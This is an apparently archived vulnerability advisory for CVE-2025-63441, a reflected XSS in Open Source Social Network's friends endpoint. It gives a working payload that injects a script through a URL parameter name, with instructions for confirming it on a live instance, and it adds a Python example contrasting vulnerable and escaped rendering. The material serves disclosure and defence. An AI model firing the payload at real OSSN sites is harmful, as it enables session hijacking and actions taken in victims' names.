Related vulnerabilities
Introduction
# CVE-2025-63441
**Title:**
Reflected XSS via the name of an arbitrarily supplied URL parameter at endpoint `u/administrator/friends`
**Summary:**
A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the `u/administrator/friends` endpoint of the OSSN (Open Source Social Network) application.
The vulnerability allows an attacker to inject malicious script through the *name* of an arbitrarily supplied URL parameter: the parameter name is reflected into the response without output encoding, so no existing parameter has to be targeted and any attacker-chosen name works.
**Impact:**
- Virtual defacement of the web site.
- Execution of any action the victim user is able to perform, in the victim's session.
- Redirection of the user to an attacker-controlled or competing site.
- Capture of the victim's (e.g. administrator's) session cookie, where the cookie is not marked `HttpOnly`.
Fixed in OSSN 8.7 and above.
**GitHub:** https://github.com/opensource-socialnetwork/opensource-socialnetwork/issues/2501
**PoC:**
Append the following query string to the affected endpoint. The script sits in the parameter name (everything before `=`): `'>` closes a quoted attribute and its tag, `<script>alert(origin)</script>` is injected (`%2f` is the URL-encoded `/` of the closing tag), and `alert(origin)` shows which origin the script executes in.
Payload: `?tcjz4'><script>alert(origin)<%2fscript>fefyj=1`
![PoC screenshot](https://github.com/user-attachments/assets/9843e99d-5623-47d7-ac68-1a21b2e70f8f)
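The following is an added example, not OSSN's code and not part of the original advisory. It shows the bug class the PoC exploits: a server that echoes query-parameter *names* into an HTML attribute without encoding. The two `render_*` templates and the hostname `ossn.example` are assumptions that mimic the pattern; the payload is the one from the PoC above. The check at the end is the same one you would apply to a live response body to confirm the reflection.

```python
"""Reflected XSS via a URL parameter name: vulnerable vs. hardened rendering.

Added example, not OSSN code. The markup templates below are assumed
stand-ins for the bug class described in CVE-2025-63441; they are not
OSSN's actual markup.
"""
from html import escape
from urllib.parse import parse_qsl, urlsplit

# PoC payload from the advisory placed on the affected endpoint.
# The hostname is a placeholder (assumption), not a real instance.
POC_URL = (
    "https://ossn.example/u/administrator/friends"
    "?tcjz4'><script>alert(origin)<%2fscript>fefyj=1"
)


def reflected_param_names(url: str) -> list[str]:
    """Return the decoded query-parameter names the server would see.

    parse_qsl percent-decodes, so '<%2fscript>' becomes '</script>' and the
    whole injection lives in the *name*, with value '1'.
    """
    query = urlsplit(url).query
    return [name for name, _value in parse_qsl(query, keep_blank_values=True)]


def render_vulnerable(param_names: list[str]) -> str:
    """Assumed vulnerable pattern: each incoming parameter name is echoed into a
    single-quoted attribute with no encoding. The PoC name closes the quote
    and the tag with ' >, then opens a real <script> element."""
    hidden = "".join(
        f"<input type='hidden' name='{name}' value=''>" for name in param_names
    )
    return f"<form action='/u/administrator/friends'>{hidden}</form>"


def render_hardened(param_names: list[str]) -> str:
    """Same markup with attribute-context encoding: html.escape(quote=True)
    turns ' into &#x27; and < > into &lt; &gt;, so the name can no longer
    break out of the attribute."""
    hidden = "".join(
        f"<input type='hidden' name='{escape(name, quote=True)}' value=''>"
        for name in param_names
    )
    return f"<form action='/u/administrator/friends'>{hidden}</form>"


def contains_live_script(markup: str) -> bool:
    """Reflection check usable on a real response body: does the PoC's
    injected element appear verbatim (i.e. unencoded) in the output?"""
    return "<script>alert(origin)</script>" in markup


if __name__ == "__main__":
    names = reflected_param_names(POC_URL)
    print("parameter names seen by server:", names)
    print("vulnerable output reflects script:", contains_live_script(render_vulnerable(names)))
    print("hardened output reflects script:  ", contains_live_script(render_hardened(names)))
```

To verify a real instance, request the PoC URL and run `contains_live_script` over the response body: an unencoded `<script>alert(origin)</script>` in the HTML confirms the reflection, while a patched build (8.7+) should return only an encoded form such as `&lt;script&gt;`. Note that encoding must match the output context; `html.escape(quote=True)` is correct for HTML attribute and text content but not for JavaScript string or URL contexts.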
File snapshot
[4.0K] /data/pocs/0913e802f3cef838e009ed37cf57c8240c522f25
└── [ 920] README.md
1 directory, 1 file
Notes
1. Accessing the original source is recommended.
2. The local PoC snapshot is available to subscribers; when the original source is gone or unreachable, the local mirror is provided as part of the subscription.
3. Continuously collecting, verifying and maintaining this PoC archive takes considerable effort, so local snapshots are included in the paid subscription. Your subscription is what keeps this material going; thank you.